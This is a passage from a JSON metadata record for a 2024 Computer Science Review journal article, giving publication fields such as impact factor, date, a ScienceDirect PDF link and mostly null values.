response.</p></div>","PeriodicalId":48633,"journal":{"name":"Computer Science Review","volume":null,"pages":null},"PeriodicalIF":12.9,"publicationDate":"2024-02-01","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"https://www.sciencedirect.com/science/article/pii/S1574013724000017/pdfft?md5=37a2ff44234d359888c071095b8d9b65&pid=1-s2.0-S1574013724000017-main.pdf","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"139738725","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"OA","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}